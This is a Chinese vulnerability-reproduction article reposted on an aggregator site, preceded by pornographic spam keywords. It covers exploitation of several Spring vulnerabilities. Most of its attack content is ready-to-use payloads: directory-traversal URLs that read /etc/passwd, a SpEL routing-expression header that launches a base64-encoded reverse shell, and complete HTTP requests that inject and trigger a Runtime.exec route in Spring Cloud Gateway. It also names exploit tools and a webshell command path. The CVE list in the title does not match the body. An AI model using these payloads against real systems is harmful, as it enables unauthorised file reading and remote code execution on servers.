国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Spring Boot 目錄遍歷--表達式注入--代碼執(zhí)行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)

這篇具有很好參考價值的文章主要介紹了Spring Boot 目錄遍歷--表達式注入--代碼執(zhí)行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

Spring Boot 目錄遍歷--表達式注入--代碼執(zhí)行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)

Spring Boot 目錄遍歷 (CVE-2021-21234)

漏洞簡介

spring-boot-actuator-logview 是一個簡單的日志文件查看器作為Spring Boot執(zhí)行器端點,在 0.2.13 版本之前存在著目錄遍歷漏洞,編號 CVE-2021-21234。漏洞本質是Spring Boot 執(zhí)行器通過請求的參數來指定文件名和文件夾路徑,經過組合拼接達到目錄遍歷,雖然源碼中檢查了文件名(filename)參數來防止目錄遍歷,但是沒有檢查文件夾(base)參數,造成了目錄遍歷

影響范圍

spring-boot-actuator-logview < 0.2.13

漏洞復現

Windows:
http://<target_url>/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
http://<target_url>/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
Linux:
http://<target_url>/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
http://<target_url>/log/view?filename=/etc/passwd&base=../../../../../../../../../../

Spring Cloud Function Spel表達式注入(CVE-2022-22963)

漏洞簡介

Spring Cloud Function提供了一個通用的模型,用于在各種平臺上部署基于函數的軟件,包括像Amazon AWS Lambda這樣的 FaaS(函數即服務,function as a service)平臺。

影響范圍

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

漏洞復現

POC:

POST:/functionRouter

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,反彈shell命令base64編碼}|{base64,-d}|{bash,-i}")

Spring Cloud Gateway遠程代碼執(zhí)行漏洞(CVE-2022-22947)

漏洞簡介

Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 構建的網關,它旨在為微服務架構提供一種簡單、有效、統一的 API 路由管理方式。當啟用或暴露不安全的 Gateway Actuator 端點時,使用 Spring Cloud Gateway 的應用程序容易受到代碼注入攻擊,遠程攻擊者可以通過發(fā)送惡意請求以執(zhí)行 SpEL 表達式,從而在目標服務器上執(zhí)行任意惡意代碼,獲取系統權限

影響范圍

Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
其他舊的、不受支持的Spring Cloud Gateway 版本

漏洞復現

  • 手工復現
    添加執(zhí)行id命令的名為test的路由,狀態(tài)碼返回201即正確添加
POST /actuator/gateway/routes/test HTTP/1.1
Host: 目標主機
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 333

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

刷新路由,狀態(tài)碼返回200正確

POST /actuator/gateway/refresh HTTP/1.1
Host:目標主機
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

直接訪問路由

/actuator/gateway/routes/test

Spring Boot 目錄遍歷--表達式注入--代碼執(zhí)行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)

  • 自動化工具
    SpringBootExploit
    Spring Boot 目錄遍歷--表達式注入--代碼執(zhí)行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)
    直接訪問地址執(zhí)行命令即可
/?cmd=

Spring Framework遠程代碼執(zhí)行漏洞 (CVE-2022-22965)

漏洞參考

深度解析丨Spring框架遠程命令執(zhí)行漏洞復現及流量特征分析(CVE-2022-22965)

自動化工具

Spring4Shell-POC
SpringBoot-Scan
不知到為啥,手工和工具都有可能翻車,多試幾次。文章來源地址http://www.zghlxwxcb.cn/news/detail-710585.html

到了這里,關于Spring Boot 目錄遍歷--表達式注入--代碼執(zhí)行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • Web攻防--Java_SQL注入--XXE注入-- SSTI模板注入--SPEL表達式注入

    編譯器在編譯sql語句時,會依次進行詞法分析、語法分析、語義分析等操作, 預編譯技術會讓數據庫跳過編譯階段,也就無法就進行詞法分析,不會被拆開,注入語句也就不會被識別為SQL的,從而防止惡意注入語句改變原有SQL語句本身邏輯。 在使用JDBC進行數據

    2024年02月09日
    瀏覽(24)
  • Day66:WEB攻防-Java安全&SPEL表達式&SSTI模版注入&XXE&JDBC&MyBatis注入

    Day66:WEB攻防-Java安全&SPEL表達式&SSTI模版注入&XXE&JDBC&MyBatis注入

    目錄 JavaSec搭建 Hello-Java-Sec搭建 Java安全-SQL注入-JDBCMyBatis JDBC:Java語言連接數據庫操作 MyBatis( mybatis是一個優(yōu)秀的基于java的持久層框架,它內部封裝了 jdbc) 代碼審計案例:inxedu后臺MyBatis注入 Java安全-XXE注入-ReaderBuilder 配置XML允許引入外部解析實體 白盒測試-XXE Java安全-SSTI模版

    2024年04月25日
    瀏覽(16)
  • Python學習筆記:正則表達式、邏輯運算符、lamda、二叉樹遍歷規(guī)則、類的判斷

    Python學習筆記:正則表達式、邏輯運算符、lamda、二叉樹遍歷規(guī)則、類的判斷

    序號 實例 說明 1 . 匹配任何字符(除換行符以外) 2 d 等效于[0-9],匹配數字 3 D 等效于[^0-9],匹配非數字 4 s 等效于[trnf],匹配空格字符 5 S 等效于[^trnf],匹配非空格字符 6 w 等效于[A-Za-z0-9],匹配單字字符 7 W 等效于[^A-Za-z0-9],匹配非單字字符 8 [ab]cdef 匹配acdef或bcd

    2024年02月11日
    瀏覽(60)
  • Spring:表達式語言

    Spring:表達式語言

    Spring 表達式(Spring EL) 是一種功能強大的表達式語言,以 #{ 表達式 } 作為定界符,用于在運行時對對象進行訪問和操作。通過使用 Spring 表達式達到簡化開發(fā)、減少邏輯或配置的編寫的目的。 Spring EL 主要可以引用 bean ,調用其屬性和方法,也可以在 bean 標簽中使用 value 屬

    2024年02月16日
    瀏覽(28)
  • Spring中的SpEL表達式

    SpEL (Spring Expression Language) 是 Spring 框架中用于在運行時對對象圖進行查詢和操作的表達式語言。它可以在不引入 Java 代碼的情況下,輕松地對對象進行值的計算、屬性的讀取、調用方法、訪問數組和集合等。SpEL廣泛應用于Spring框架的許多模塊中,比如Spring MVC、Spring Data、Sp

    2024年02月15日
    瀏覽(28)
  • Spring表達式語言(SPEL)學習(03)

    在表達式中直接寫name和getName(),這時候Expression是無法解析的,因為其不知道name和getName()對應什么意思 當表達式是基于某一個對象時,我們可以把對應的對象作為一個rootObject傳遞給對應的Experssion進行取值 通過指定EvaluationContext我們可以讓name和getName()變得有意義,指定了Ev

    2024年02月02日
    瀏覽(51)
  • Spring AOP切入點表達式

    Spring AOP切入點表達式

    先來認識兩個概念吧(其實Spring AOP實現功能增強的方式就是代理模式) 目標對象(Target):原始功能去掉共性功能對應的類產生的對象,這種對象是無法直接完成最終工作的 代理(Proxy):目標對象無法直接完成工作,需要對其進行功能回填,通過原始對象的代理對象實現 回歸主

    2023年04月24日
    瀏覽(56)
  • Spring Security 中自定義權限表達式

    Spring Security 中自定義權限表達式

    前言 這是我在這個網站整理的筆記,有錯誤的地方請指出,關注我,接下來還會持續(xù)更新。 作者:神的孩子都在歌唱 通過編程授權方法 首先,聲明一個 Bean,如下所示: 然后,在注解中以如下方式引用該 Bean: Spring Security 將在每次方法調用時調用該Bean上的給定方法。 這樣

    2024年02月06日
    瀏覽(36)
  • spring AOP中pointcut表達式詳解

    spring AOP中pointcut表達式詳解

    ???????????? 哈嘍!大家好,我是「奇點」,江湖人稱 singularity。剛工作幾年,想和大家一同進步???? 一位上進心十足的【Java ToB端大廠領域博主】!?????? 喜歡java和python,平時比較懶,能用程序解決的堅決不手動解決?????? ? 如果有對【java】感興趣的【小可

    2024年02月13日
    瀏覽(17)
  • 深入理解Spring EL表達式的高級功能

    深入理解Spring EL表達式的高級功能

    歡迎來到我的博客,代碼的世界里,每一行都是一個故事 EL表達式不僅僅局限于基礎用法,它還提供了豐富的高級功能。在這篇博客中,我們將揭開這些功能的神秘面紗,讓你成為EL表達式的真正大師。 在EL(Expression Language)表達式中,可以使用各種操作符和語法來操作集合

    2024年01月25日
    瀏覽(28)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包